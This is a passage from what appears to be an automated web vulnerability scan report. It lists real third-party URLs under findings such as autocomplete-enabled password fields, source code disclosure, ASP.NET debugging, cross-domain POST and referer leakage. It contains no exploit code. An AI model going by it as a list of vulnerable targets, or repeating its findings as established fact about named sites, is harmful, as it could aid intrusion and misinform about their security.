17.79. http://bw.pronto.ru/brick/5/167/36/30/24/&rnd=252896795

17.80. http://bw.pronto.ru/brick/5/167/36/30/26/&rnd=556115021

17.81. http://bw.pronto.ru/brick/5/167/36/30/28/&rnd=128924368

17.82. http://bw.pronto.ru/brick/5/167/36/30/29/&rnd=443104168

17.83. http://bw.pronto.ru/brick/5/167/36/30/37/&rnd=179025170

17.84. http://bw.pronto.ru/brick/5/167/36/30/44/&rnd=3108367

17.85. http://bw.pronto.ru/brickgrid/5/167/36/30/138/29/&rnd=808462191

17.86. http://bw.pronto.ru/brickgrid/5/167/36/30/236/49/&rnd=44849087

17.87. http://bw.pronto.ru/brickgrid/5/167/36/30/30/15/&rnd=555318316

17.88. http://bw.pronto.ru/brickgrid/5/167/36/30/31/16/&rnd=189356183

17.89. https://checkout.netsuite.com/s

17.90. http://core1.node15.top.mail.ru/counter

17.91. http://core1.node15.top.mail.ru/counter

17.92. http://core2.node12.top.mail.ru/counter

17.93. http://count.rbc.ru/p712.gif

17.94. http://counter.hitslink.com/statistics.asp

17.95. http://counter.rambler.ru/top100.cnt

17.96. http://counter.yadro.ru/hit

17.97. https://customer.kronos.com/Default.asp

17.98. https://customer.kronos.com/user/forgotpassword.asp

17.99. https://customer.kronos.com/user/forgotusername.asp

17.100. https://customer.kronos.com/user/logindenied.asp

17.101. http://d1.openx.org/ajs.php

17.102. http://d1.openx.org/lg.php

17.103. http://d7.zedo.com/img/bh.gif

17.104. http://demo.kayako.com/supportsuite/index.php

17.105. http://demr.opt.fimserve.com/adopt/

17.106. http://desk.opt.fimserve.com/adopt/

17.107. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter

17.108. http://goods.adnectar.com/analytics/get_avia_js

17.109. http://hostpapasupport.com/index.php

17.110. http://idcs.interclick.com/Segment.aspx

17.111. http://ideco-software.ru/products/ims/

17.112. http://imagesrv.gartner.com/cio/css/main.css

17.113. http://imagesrv.gartner.com/js/utility_tech.js

17.114. http://kronos.d1.sc.omtrdc.net/b/ss/kronos-dev/1/H.22.1/s64896461574826

17.115. http://l.azjmp.com/f.php

17.116. http://mail.ru/

17.117. http://map.media6degrees.com/orbserv/aopix

17.118. http://mc.yandex.ru/watch/57617

17.119. http://pda.loveplanet.ru/

17.120. http://pixel.fetchback.com/serve/fb/pdc

17.121. http://pixel.quantserve.com/pixel

17.122. http://pixel.rubiconproject.com/tap.php

17.123. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil

17.124. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

17.125. http://pogoda.webalta.ru/

17.126. http://pretty.ru/

17.127. http://r2.mail.ru/b12179277.gif

17.128. http://r2.mail.ru/b12179279.gif

17.129. http://r2.mail.ru/b12179280.gif

17.130. http://r2.mail.ru/b12201458.png

17.131. http://r2.mail.ru/b12526055.gif

17.132. http://r2.mail.ru/b12526056.jpg

17.133. http://r2.mail.ru/b12526057.jpg

17.134. http://r2.mail.ru/b12526058.jpg

17.135. http://r2.mail.ru/b12526059.jpg

17.136. http://r2.mail.ru/b12526060.jpg

17.137. http://r2.mail.ru/b12526061.jpg

17.138. http://r2.mail.ru/b12526062.jpg

17.139. http://r2.mail.ru/b12526063.jpg

17.140. http://r2.mail.ru/b12526064.jpg

17.141. http://r2.mail.ru/b12526065.gif

17.142. http://r2.mail.ru/b12526191.gif

17.143. http://r2.mail.ru/b12526192.gif

17.144. http://r2.mail.ru/b12526193.gif

17.145. http://r2.mail.ru/b12526194.gif

17.146. http://r2.mail.ru/b12526208.gif

17.147. http://r2.mail.ru/b12526210.gif

17.148. http://r2.mail.ru/b12527647.gif

17.149. http://r2.mail.ru/b12529050.jpg

17.150. http://r2.mail.ru/b12530142.jpg

17.151. http://r2.mail.ru/b12530159.jpg

17.152. http://r2.mail.ru/b12531249.jpg

17.153. http://r2.mail.ru/b12531545.jpg

17.154. http://r2.mail.ru/b12531624.jpg

17.155. http://r2.mail.ru/b12532203.jpg

17.156. http://r2.mail.ru/b12752186.jpg

17.157. http://r2.mail.ru/b12752583.jpg

17.158. http://r2.mail.ru/b12752584.jpg

17.159. http://r2.mail.ru/b12752585.jpg

17.160. http://r2.mail.ru/b12752586.jpg

17.161. http://r2.mail.ru/b12855502.png

17.162. http://r2.mail.ru/b12887675.jpg

17.163. http://r2.mail.ru/b12887676.jpg

17.164. http://r2.mail.ru/b12887677.jpg

17.165. http://r2.mail.ru/b12961140.jpg

17.166. http://r2.mail.ru/b12961154.jpg

17.167. http://r2.mail.ru/b12961373.jpg

17.168. http://r2.mail.ru/b12962356.jpg

17.169. http://r2.mail.ru/b12963308.jpg

17.170. http://r2.mail.ru/b12965362.jpg

17.171. http://r2.mail.ru/b12968616.jpg

17.172. http://r2.mail.ru/b12979027.jpg

17.173. http://r2.mail.ru/b13039712.jpg

17.174. http://r2.mail.ru/b13044176.jpg

17.175. http://r2.mail.ru/b13049054.jpg

17.176. http://r2.mail.ru/b13050852.jpg

17.177. http://r2.mail.ru/b13057590.swf

17.178. http://r2.mail.ru/b13058787.jpg

17.179. http://r2.mail.ru/b13058840.jpg

17.180. http://r2.mail.ru/b13058851.jpg

17.181. http://r2.mail.ru/b13058852.jpg

17.182. http://r2.mail.ru/b13058968.jpg

17.183. http://r2.mail.ru/b13059223.jpg

17.184. http://r2.mail.ru/b13059860.jpg

17.185. http://r2.mail.ru/b13060405.jpg

17.186. http://r2.mail.ru/b13060487.jpg

17.187. http://r2.mail.ru/b13061099.jpg

17.188. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif

17.189. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif

17.190. http://segment-pixel.invitemedia.com/pixel

17.191. http://server.iad.liveperson.net/hc/48536788/

17.192. http://server.iad.liveperson.net/hc/48536788/

17.193. http://server.iad.liveperson.net/hc/48536788/

17.194. http://shopping.netsuite.com/s.nl

17.195. http://show.multiclick.ru/blank.php

17.196. http://sorry.google.com/sorry/

17.197. http://stats.kroogy.com/cnt-gif1x1.php

17.198. http://storage.trafic.ro/js/trafic.js

17.199. https://support.comodo.com/index.php

17.200. https://support.comodo.com/index.php

17.201. http://support.trust-guard.com/index.php

17.202. https://support.trust-guard.com/index.php

17.203. https://support.trust-guard.com/visitor/

17.204. http://t2.trackalyzer.com/trackalyze.asp

17.205. http://top5.mail.ru/counter

17.206. http://translate.googleapis.com/translate_a/t

17.207. http://vkontakte.ru/login.php

17.208. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

17.209. http://www.dmca.com/Protection/Status.aspx

17.210. http://www.eset.com/us/

17.211. https://www.fusionvm.com/FusionVM/

17.212. http://www.gartner.com/0_admin/css/documentdisplay.css

17.213. http://www.gartner.com/0_admin/css/docverterNGRA.css

17.214. http://www.gartner.com/0_admin/images/documentdisplay/blue_gt_bullet.gif

17.215. http://www.gartner.com/0_admin/images/documentdisplay/blue_v_bullet.gif

17.216. http://www.gartner.com/0_admin/images/documentdisplay/dl_pdf.gif

17.217. http://www.gartner.com/0_admin/images/documentdisplay/gartner_logo.gif

17.218. http://www.gartner.com/0_admin/images/documentdisplay/gray_gt_bullet.gif

17.219. http://www.gartner.com/0_admin/images/documentdisplay/research_logo.gif

17.220. http://www.gartner.com/DisplayDocument

17.221. http://www.gartner.com/images/x.gif

17.222. http://www.gartner.com/js/utility.js

17.223. http://www.gartner.com/js/webtrendsCookies.js

17.224. http://www.googleadservices.com/pagead/conversion/1069716420/

17.225. http://www.googleadservices.com/pagead/conversion/1072501689/

17.226. http://www.kayako.com/

17.227. http://www.kayako.com/styles/

17.228. http://www.kayako.com/styles/graphics/loader.white.gif

17.229. http://www.kronos.com/

17.230. http://www.livejournal.com/tools/endpoints/journalspotlight.bml

17.231. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T

17.232. http://www.smpone.com/

17.233. http://www.smpone.com/404.php

17.234. http://www.smpone.com/News-more-79.html

17.235. http://www.smpone.com/News-more-80.html

17.236. http://www.smpone.com/News.html

17.237. http://www.smpone.com/Sections-read-10.html

17.238. http://www.smpone.com/Sections-read-125.html

17.239. http://www.smpone.com/Sections-read-126.html

17.240. http://www.smpone.com/Sections-read-16.html

17.241. http://www.smpone.com/Sections-read-20.html

17.242. http://www.smpone.com/Sections-read-21.html

17.243. http://www.smpone.com/Sections-read-29.html

17.244. http://www.smpone.com/Sections-read-3.html

17.245. http://www.smpone.com/Sections-read-30.html

17.246. http://www.smpone.com/Sections-read-7.html

17.247. http://www.smpone.com/Static-contact.html

17.248. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388

17.249. http://www.tresware.com/

17.250. http://www.tresware.com/CustomPHPProgrammingNJ.html

17.251. http://www.tresware.com/Static-contact.html

17.252. http://www.tresware.com/webcontentmanagementNJ.html

18. Password field with autocomplete enabled

18.1. https://checkout.netsuite.com/s.nl

18.2. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f

18.3. https://customer.kronos.com/

18.4. https://customer.kronos.com/Default.asp

18.5. https://customer.kronos.com/user/logindenied.asp

18.6. http://demo.kayako.com/supportsuite/index.php

18.7. http://direct.yandex.ru/

18.8. http://direct.yandex.ru/pages/direct/_direct-1303387947.js

18.9. https://hourly.deploy.com/hmc/report/

18.10. https://hourly.deploy.com/hmc/report/

18.11. https://hourly.deploy.com/hmc/report/

18.12. https://hourly.deploy.com/hmc/report/

18.13. https://hourly.deploy.com/hmc/report/

18.14. https://hourly.deploy.com/hmc/report/

18.15. https://hourly.deploy.com/hmc/report/

18.16. https://hourly.deploy.com/hmc/report/

18.17. https://hourly.deploy.com/hmc/report/

18.18. https://hourly.deploy.com/hmc/report/

18.19. https://hourly.deploy.com/hmc/report/

18.20. https://hourly.deploy.com/hmc/report/

18.21. https://hourly.deploy.com/hmc/report/

18.22. https://hourly.deploy.com/hmc/report/

18.23. https://hourly.deploy.com/hmc/report/

18.24. https://hourly.deploy.com/hmc/report/

18.25. https://hourly.deploy.com/hmc/report/

18.26. https://hourly.deploy.com/hmc/report/

18.27. https://hourly.deploy.com/hmc/report/

18.28. https://hourly.deploy.com/hmc/report/

18.29. https://hourly.deploy.com/hmc/report/

18.30. https://hourly.deploy.com/hmc/report/

18.31. https://hourly.deploy.com/hmc/report/

18.32. https://hourly.deploy.com/hmc/report/

18.33. https://hourly.deploy.com/hmc/report/

18.34. https://hourly.deploy.com/hmc/report/

18.35. https://hourly.deploy.com/hmc/report/

18.36. https://hourly.deploy.com/hmc/report/

18.37. https://hourly.deploy.com/hmc/report/

18.38. https://hourly.deploy.com/hmc/report/

18.39. https://hourly.deploy.com/hmc/report/

18.40. https://hourly.deploy.com/hmc/report/

18.41. https://hourly.deploy.com/hmc/report/

18.42. https://hourly.deploy.com/hmc/report/

18.43. https://hourly.deploy.com/hmc/report/

18.44. https://hourly.deploy.com/hmc/report/

18.45. https://hourly.deploy.com/hmc/report/

18.46. https://hourly.deploy.com/hmc/report/

18.47. https://hourly.deploy.com/hmc/report/

18.48. https://hourly.deploy.com/hmc/report/

18.49. https://hourly.deploy.com/hmc/report/

18.50. https://hourly.deploy.com/hmc/report/

18.51. https://hourly.deploy.com/hmc/report/

18.52. https://hourly.deploy.com/hmc/report/

18.53. https://hourly.deploy.com/hmc/report/

18.54. https://hourly.deploy.com/hmc/report/

18.55. https://hourly.deploy.com/hmc/report/

18.56. https://hourly.deploy.com/hmc/report/

18.57. https://hourly.deploy.com/hmc/report/

18.58. https://hourly.deploy.com/hmc/report/

18.59. https://hourly.deploy.com/hmc/report/

18.60. https://hourly.deploy.com/hmc/report/

18.61. https://hourly.deploy.com/hmc/report/

18.62. https://hourly.deploy.com/hmc/report/

18.63. https://hourly.deploy.com/hmc/report/

18.64. https://hourly.deploy.com/hmc/report/

18.65. https://hourly.deploy.com/hmc/report/

18.66. https://hourly.deploy.com/hmc/report/

18.67. https://hourly.deploy.com/hmc/report/

18.68. https://hourly.deploy.com/hmc/report/

18.69. https://hourly.deploy.com/hmc/report/

18.70. https://hourly.deploy.com/hmc/report/

18.71. https://hourly.deploy.com/hmc/report/

18.72. https://hourly.deploy.com/hmc/report/

18.73. https://hourly.deploy.com/hmc/report/

18.74. https://hourly.deploy.com/hmc/report/

18.75. https://hourly.deploy.com/hmc/report/

18.76. https://hourly.deploy.com/hmc/report/

18.77. https://hourly.deploy.com/hmc/report/

18.78. https://hourly.deploy.com/hmc/report/

18.79. https://hourly.deploy.com/hmc/report/

18.80. https://hourly.deploy.com/hmc/report/

18.81. https://hourly.deploy.com/hmc/report/

18.82. https://hourly.deploy.com/hmc/report/

18.83. https://hourly.deploy.com/hmc/report/

18.84. https://hourly.deploy.com/hmc/report/

18.85. https://hourly.deploy.com/hmc/report/

18.86. https://hourly.deploy.com/hmc/report/

18.87. https://hourly.deploy.com/hmc/report/

18.88. https://hourly.deploy.com/hmc/report/

18.89. https://hourly.deploy.com/hmc/report/

18.90. https://hourly.deploy.com/hmc/report/

18.91. https://hourly.deploy.com/hmc/report/

18.92. https://hourly.deploy.com/hmc/report/

18.93. https://hourly.deploy.com/hmc/report/

18.94. https://hourly.deploy.com/hmc/report/

18.95. https://hourly.deploy.com/hmc/report/

18.96. https://hourly.deploy.com/hmc/report/

18.97. https://hourly.deploy.com/hmc/report/

18.98. https://hourly.deploy.com/hmc/report/

18.99. https://hourly.deploy.com/hmc/report/

18.100. https://hourly.deploy.com/hmc/report/

18.101. https://hourly.deploy.com/hmc/report/

18.102. https://hourly.deploy.com/hmc/report/

18.103. https://hourly.deploy.com/hmc/report/

18.104. https://hourly.deploy.com/hmc/report/

18.105. https://hourly.deploy.com/hmc/report/

18.106. https://hourly.deploy.com/hmc/report/

18.107. https://hourly.deploy.com/hmc/report/

18.108. https://hourly.deploy.com/hmc/report/

18.109. https://hourly.deploy.com/hmc/report/

18.110. https://hourly.deploy.com/hmc/report/

18.111. https://hourly.deploy.com/hmc/report/

18.112. https://hourly.deploy.com/hmc/report/

18.113. https://hourly.deploy.com/hmc/report/

18.114. https://hourly.deploy.com/hmc/report/

18.115. https://hourly.deploy.com/hmc/report/

18.116. https://hourly.deploy.com/hmc/report/

18.117. https://hourly.deploy.com/hmc/report/

18.118. https://hourly.deploy.com/hmc/report/

18.119. https://hourly.deploy.com/hmc/report/

18.120. https://hourly.deploy.com/hmc/report/

18.121. https://hourly.deploy.com/hmc/report/

18.122. https://hourly.deploy.com/hmc/report/

18.123. https://hourly.deploy.com/hmc/report/

18.124. https://hourly.deploy.com/hmc/report/

18.125. https://hourly.deploy.com/hmc/report/

18.126. https://hourly.deploy.com/hmc/report/

18.127. https://hourly.deploy.com/hmc/report/

18.128. https://hourly.deploy.com/hmc/report/

18.129. https://hourly.deploy.com/hmc/report/

18.130. https://hourly.deploy.com/hmc/report/

18.131. https://hourly.deploy.com/hmc/report/

18.132. https://hourly.deploy.com/hmc/report/

18.133. https://hourly.deploy.com/hmc/report/

18.134. https://hourly.deploy.com/hmc/report/

18.135. https://hourly.deploy.com/hmc/report/

18.136. https://hourly.deploy.com/hmc/report/

18.137. https://hourly.deploy.com/hmc/report/

18.138. https://hourly.deploy.com/hmc/report/

18.139. https://hourly.deploy.com/hmc/report/

18.140. https://hourly.deploy.com/hmc/report/

18.141. https://hourly.deploy.com/hmc/report/

18.142. https://hourly.deploy.com/hmc/report/

18.143. https://hourly.deploy.com/hmc/report/

18.144. https://hourly.deploy.com/hmc/report/

18.145. https://hourly.deploy.com/hmc/report/

18.146. https://hourly.deploy.com/hmc/report/index.cfm

18.147. https://hourly.deploy.com/hmc/report/index.cfm

18.148. https://hourly.deploy.com/hmc/report/index.cfm

18.149. https://hourly.deploy.com/hmc/report/index.cfm

18.150. https://hourly.deploy.com/hmc/report/index.cfm

18.151. https://hourly.deploy.com/hmc/report/index.cfm

18.152. https://hourly.deploy.com/hmc/report/index.cfm

18.153. https://hourly.deploy.com/hmc/report/index.cfm

18.154. https://hourly.deploy.com/hmc/report/index.cfm

18.155. https://hourly.deploy.com/hmc/report/index.cfm

18.156. https://hourly.deploy.com/hmc/report/index.cfm

18.157. https://hourly.deploy.com/hmc/report/index.cfm

18.158. https://hourly.deploy.com/hmc/report/index.cfm

18.159. https://hourly.deploy.com/hmc/report/index.cfm

18.160. https://hourly.deploy.com/hmc/report/index.cfm

18.161. https://hourly.deploy.com/hmc/report/index.cfm

18.162. https://hourly.deploy.com/hmc/report/index.cfm

18.163. https://hourly.deploy.com/hmc/report/index.cfm

18.164. https://hourly.deploy.com/hmc/report/index.cfm

18.165. https://hourly.deploy.com/hmc/report/index.cfm

18.166. https://hourly.deploy.com/hmc/report/index.cfm

18.167. https://hourly.deploy.com/hmc/report/index.cfm

18.168. https://hourly.deploy.com/hmc/report/index.cfm

18.169. https://hourly.deploy.com/hmc/report/index.cfm

18.170. https://hourly.deploy.com/hmc/report/index.cfm

18.171. https://hourly.deploy.com/hmc/report/index.cfm

18.172. https://hourly.deploy.com/hmc/report/index.cfm

18.173. https://hourly.deploy.com/hmc/report/index.cfm

18.174. https://hourly.deploy.com/hmc/report/index.cfm

18.175. https://hourly.deploy.com/hmc/report/index.cfm

18.176. https://hourly.deploy.com/hmc/report/index.cfm

18.177. https://hourly.deploy.com/hmc/report/index.cfm

18.178. https://hourly.deploy.com/hmc/report/index.cfm

18.179. https://hourly.deploy.com/hmc/report/index.cfm

18.180. https://hourly.deploy.com/hmc/report/index.cfm

18.181. https://hourly.deploy.com/hmc/report/index.cfm

18.182. https://hourly.deploy.com/hmc/report/index.cfm

18.183. https://hourly.deploy.com/hmc/report/index.cfm

18.184. https://hourly.deploy.com/hmc/report/index.cfm

18.185. https://hourly.deploy.com/hmc/report/index.cfm

18.186. https://hourly.deploy.com/hmc/report/index.cfm

18.187. https://hourly.deploy.com/hmc/report/index.cfm

18.188. https://hourly.deploy.com/hmc/report/index.cfm

18.189. https://hourly.deploy.com/hmc/report/index.cfm

18.190. https://hourly.deploy.com/hmc/report/index.cfm

18.191. https://hourly.deploy.com/hmc/report/index.cfm

18.192. https://hourly.deploy.com/hmc/report/index.cfm

18.193. https://hourly.deploy.com/hmc/report/index.cfm

18.194. https://hourly.deploy.com/hmc/report/index.cfm

18.195. https://hourly.deploy.com/hmc/report/index.cfm

18.196. https://hourly.deploy.com/hmc/report/index.cfm

18.197. https://hourly.deploy.com/hmc/report/index.cfm

18.198. https://hourly.deploy.com/hmc/report/index.cfm

18.199. https://hourly.deploy.com/hmc/report/index.cfm

18.200. https://hourly.deploy.com/hmc/report/index.cfm

18.201. https://hourly.deploy.com/hmc/report/index.cfm

18.202. https://hourly.deploy.com/hmc/report/index.cfm

18.203. https://hourly.deploy.com/hmc/report/index.cfm

18.204. https://hourly.deploy.com/hmc/report/index.cfm

18.205. https://hourly.deploy.com/hmc/report/index.cfm

18.206. https://hourly.deploy.com/hmc/report/index.cfm

18.207. https://hourly.deploy.com/hmc/report/index.cfm

18.208. https://hourly.deploy.com/hmc/report/index.cfm

18.209. https://hourly.deploy.com/hmc/report/index.cfm

18.210. https://hourly.deploy.com/hmc/report/index.cfm

18.211. https://hourly.deploy.com/hmc/report/index.cfm

18.212. https://hourly.deploy.com/hmc/report/index.cfm

18.213. https://hourly.deploy.com/hmc/report/index.cfm

18.214. https://hourly.deploy.com/hmc/report/index.cfm

18.215. https://hourly.deploy.com/hmc/report/index.cfm

18.216. https://hourly.deploy.com/hmc/report/index.cfm

18.217. https://hourly.deploy.com/hmc/report/index.cfm

18.218. https://hourly.deploy.com/hmc/report/index.cfm

18.219. https://hourly.deploy.com/hmc/report/index.cfm

18.220. https://hourly.deploy.com/hmc/report/index.cfm

18.221. https://hourly.deploy.com/hmc/report/index.cfm

18.222. https://hourly.deploy.com/hmc/report/index.cfm

18.223. https://hourly.deploy.com/hmc/report/index.cfm

18.224. https://hourly.deploy.com/hmc/report/index.cfm

18.225. https://hourly.deploy.com/hmc/report/index.cfm

18.226. https://hourly.deploy.com/hmc/report/index.cfm

18.227. https://hourly.deploy.com/hmc/report/index.cfm

18.228. https://hourly.deploy.com/hmc/report/index.cfm

18.229. https://hourly.deploy.com/hmc/report/index.cfm

18.230. https://hourly.deploy.com/hmc/report/index.cfm

18.231. https://hourly.deploy.com/hmc/report/index.cfm

18.232. https://hourly.deploy.com/hmc/report/index.cfm

18.233. https://hourly.deploy.com/hmc/report/index.cfm

18.234. https://hourly.deploy.com/hmc/report/index.cfm

18.235. https://hourly.deploy.com/hmc/report/index.cfm

18.236. https://hourly.deploy.com/hmc/report/index.cfm

18.237. https://hourly.deploy.com/hmc/report/index.cfm

18.238. https://hourly.deploy.com/hmc/report/index.cfm

18.239. https://hourly.deploy.com/hmc/report/index.cfm

18.240. https://hourly.deploy.com/hmc/report/index.cfm

18.241. https://hourly.deploy.com/hmc/report/index.cfm

18.242. https://hourly.deploy.com/hmc/report/index.cfm

18.243. https://hourly.deploy.com/hmc/report/index.cfm

18.244. https://hourly.deploy.com/hmc/report/index.cfm

18.245. https://hourly.deploy.com/hmc/report/index.cfm

18.246. https://hourly.deploy.com/hmc/report/index.cfm

18.247. https://hourly.deploy.com/hmc/report/index.cfm

18.248. https://hourly.deploy.com/hmc/report/index.cfm

18.249. https://hourly.deploy.com/hmc/report/index.cfm

18.250. https://hourly.deploy.com/hmc/report/index.cfm

18.251. https://hourly.deploy.com/hmc/report/index.cfm

18.252. https://hourly.deploy.com/hmc/report/index.cfm

18.253. https://hourly.deploy.com/hmc/report/index.cfm

18.254. https://hourly.deploy.com/hmc/report/index.cfm

18.255. https://hourly.deploy.com/hmc/report/index.cfm

18.256. https://hourly.deploy.com/hmc/report/index.cfm

18.257. https://hourly.deploy.com/hmc/report/index.cfm

18.258. https://hourly.deploy.com/hmc/report/index.cfm

18.259. https://hourly.deploy.com/hmc/report/index.cfm

18.260. https://hourly.deploy.com/hmc/report/index.cfm

18.261. https://hourly.deploy.com/hmc/report/index.cfm

18.262. https://hourly.deploy.com/hmc/report/index.cfm

18.263. https://hourly.deploy.com/hmc/report/index.cfm

18.264. https://hourly.deploy.com/hmc/report/index.cfm

18.265. https://hourly.deploy.com/hmc/report/index.cfm

18.266. https://hourly.deploy.com/hmc/report/index.cfm

18.267. https://hourly.deploy.com/hmc/report/index.cfm

18.268. https://hourly.deploy.com/hmc/report/index.cfm

18.269. https://hourly.deploy.com/hmc/report/index.cfm

18.270. https://hourly.deploy.com/hmc/report/index.cfm

18.271. https://hourly.deploy.com/hmc/report/index.cfm

18.272. https://hourly.deploy.com/hmc/report/index.cfm

18.273. https://hourly.deploy.com/hmc/report/index.cfm

18.274. https://hourly.deploy.com/hmc/report/index.cfm

18.275. https://hourly.deploy.com/hmc/report/index.cfm

18.276. https://hourly.deploy.com/hmc/report/index.cfm

18.277. https://hourly.deploy.com/hmc/report/index.cfm

18.278. https://hourly.deploy.com/hmc/report/index.cfm

18.279. https://hourly.deploy.com/hmc/report/index.cfm

18.280. https://hourly.deploy.com/hmc/report/index.cfm

18.281. https://hourly.deploy.com/hmc/report/index.cfm

18.282. https://hourly.deploy.com/hmc/report/index.cfm

18.283. https://hourly.deploy.com/hmc/report/index.cfm

18.284. https://hourly.deploy.com/hmc/report/index.cfm

18.285. https://hourly.deploy.com/hmc/report/index.cfm

18.286. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

18.287. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

18.288. http://mail.ru/

18.289. http://my.webalta.ru/public/engine/templates.js

18.290. http://my.webalta.ru/public/engine/templates.js

18.291. http://odnoklassniki.ru/

18.292. http://pda.loveplanet.ru/

18.293. http://pretty.ru/

18.294. https://secure.trust-guard.com/

18.295. https://secure.trust-guard.com/index.php

18.296. https://support.comodo.com/

18.297. https://support.comodo.com/index.php

18.298. http://support.trust-guard.com/

18.299. http://support.trust-guard.com/index.php

18.300. https://support.trust-guard.com/

18.301. https://support.trust-guard.com/index.php

18.302. https://system.netsuite.com/pages/customerlogin.jsp

18.303. http://vkontakte.ru/

18.304. http://www.integritydefender.com/account.php

18.305. http://www.livejournal.com/

18.306. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

18.307. http://www.ripoffreport.com/LoginPage.aspx

19. Source code disclosure

19.1. https://hourly.deploy.com/hmc/report/index.cfm

19.2. http://l-files.livejournal.net/userapps/10/image

19.3. http://www.elineaccessories.com/static/js/int/public/jquery.iv.js

19.4. http://www.netsuite.com/portal/javascript/NLPortal.js

20. ASP.NET debugging enabled

20.1. http://counter.hitslink.com/Default.aspx

20.2. http://ideco-software.ru/Default.aspx

21. Referer-dependent response

21.1. http://pixel.fetchback.com/serve/fb/pdc

21.2. http://solutions.kronos.com/content/experience2011

21.3. https://support.trust-guard.com/index.php%253f_ca=css&group=default

21.4. https://support.trust-guard.com/index.php%3f_ca=css&group=default

21.5. https://support.trust-guard.com/themes/client_default/sendbuttonbg.gif)

21.6. https://support.trust-guard.com/themes/client_default/sendbuttonbg.gif)%3b

21.7. http://www.dmca.com/Protection/Status.aspx

21.8. http://www.eset.com/us/

21.9. http://www.eset.com/us/business/products

21.10. http://www.eset.com/us/business/server-security/linux-file

21.11. http://www.eset.com/us/home/smart-security

21.12. http://www.eset.com/us/store

21.13. http://www.facebook.com/plugins/like.php

22. Cross-domain POST

22.1. http://direct.yandex.ru/

22.2. http://nguard.com/contact.aspx

22.3. http://nguard.com/security/contact.aspx

22.4. http://odnoklassniki.ru/

22.5. http://www.customermagnetism.com/

22.6. http://www.customermagnetism.com/case-studies/

22.7. http://www.customermagnetism.com/free-consultation/

22.8. http://www.customermagnetism.com/pay-per-click-services/

22.9. http://www.customermagnetism.com/seo-faq/

22.10. http://www.eset.com/us/home/smart-security

22.11. http://www.eset.com/us/store

22.12. http://www.eset.com/us/store

22.13. http://www.eset.com/us/store

22.14. http://www.eset.com/us/store

22.15. http://www.eset.com/us/store

22.16. http://www.eset.com/us/store

22.17. http://www.integritydefender.com/buyerDetails.php

22.18. http://www.removeyourname.com/company/contact.html

22.19. http://www.reputationchanger.com/

23. Cross-domain Referer leakage

23.1. http://ad.amgdgt.com/ads/

23.2. http://ad.amgdgt.com/ads/

23.3. http://an.yandex.ru/code/57617

23.4. http://an.yandex.ru/code/57617

23.5. http://an.yandex.ru/code/57617

23.6. http://an.yandex.ru/code/66894

23.7. https://checkout.netsuite.com/s.nl

23.8. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f

23.9. http://direct.yandex.ru/

23.10. http://duckduckgo.com/

23.11. http://foreign.dt00.net/zones/zone25.php

23.12. http://forums.manageengine.com/fbw

23.13. http://googleads.g.doubleclick.net/pagead/ads

23.14. http://googleads.g.doubleclick.net/pagead/ads

23.15. http://googleads.g.doubleclick.net/pagead/ads

23.16. http://googleads.g.doubleclick.net/pagead/ads

23.17. http://googleads.g.doubleclick.net/pagead/ads

23.18. http://googleads.g.doubleclick.net/pagead/ads

23.19. http://googleads.g.doubleclick.net/pagead/ads

23.20. http://googleads.g.doubleclick.net/pagead/ads

23.21. http://googleads.g.doubleclick.net/pagead/ads

23.22. http://googleads.g.doubleclick.net/pagead/ads

23.23. http://googleads.g.doubleclick.net/pagead/ads

23.24. http://googleads.g.doubleclick.net/pagead/ads

23.25. http://googleads.g.doubleclick.net/pagead/ads

23.26. http://googleads.g.doubleclick.net/pagead/ads

23.27. http://googleads.g.doubleclick.net/pagead/ads

23.28. http://googleads.g.doubleclick.net/pagead/ads

23.29. http://googleads.g.doubleclick.net/pagead/ads

23.30. http://googleads.g.doubleclick.net/pagead/ads

23.31. http://googleads.g.doubleclick.net/pagead/ads

23.32. http://googleads.g.doubleclick.net/pagead/ads

23.33. http://googleads.g.doubleclick.net/pagead/ads

23.34. http://googleads.g.doubleclick.net/pagead/ads

23.35. http://googleads.g.doubleclick.net/pagead/ads

23.36. http://googleads.g.doubleclick.net/pagead/ads

23.37. http://googleads.g.doubleclick.net/pagead/ads

23.38. http://googleads.g.doubleclick.net/pagead/ads

23.39. http://googleads.g.doubleclick.net/pagead/ads

23.40. http://googleads.g.doubleclick.net/pagead/ads

23.41. http://googleads.g.doubleclick.net/pagead/ads

23.42. http://googleads.g.doubleclick.net/pagead/ads

23.43. http://googleads.g.doubleclick.net/pagead/ads

23.44. http://googleads.g.doubleclick.net/pagead/ads

23.45. http://googleads.g.doubleclick.net/pagead/ads

23.46. http://googleads.g.doubleclick.net/pagead/ads

23.47. http://googleads.g.doubleclick.net/pagead/ads

23.48. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/

23.49. http://ib.adnxs.com/ab

23.50. http://ib.adnxs.com/ab

23.51. http://ideco-software.ru/products/ims/

23.52. http://ioerror.us/bb2-support-key

23.53. http://js.dt00.net/public/smi/elastic/24.js

23.54. http://jsc.dt00.net/w/e/webalta.ru.1001.js

23.55. http://jsc.dt00.net/w/e/webalta.ru.1668.js

23.56. http://jsg.dt00.net/m/a/marketgid.com.i5.js

23.57. http://jsg.dt00.net/m/a/marketgid.com.i59.js

23.58. http://learn.shavlik.com/shavlik/index.cfm

23.59. http://learn.shavlik.com/shavlik/index.cfm

23.60. http://limg.imgsmail.ru/r/js/splash.js

23.61. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

23.62. http://nguard.com/vulnerability-assessment/

23.63. http://pixel.fetchback.com/serve/fb/pdc

23.64. http://playaudiomessage.com/play.asp

23.65. http://playaudiomessage.com/play.asp

23.66. http://playaudiomessage.com/play.asp

23.67. http://player.vimeo.com/video/22043447

23.68. http://shopping.netsuite.com/s.nl

23.69. http://storage.trafic.ro/js/trafic.js

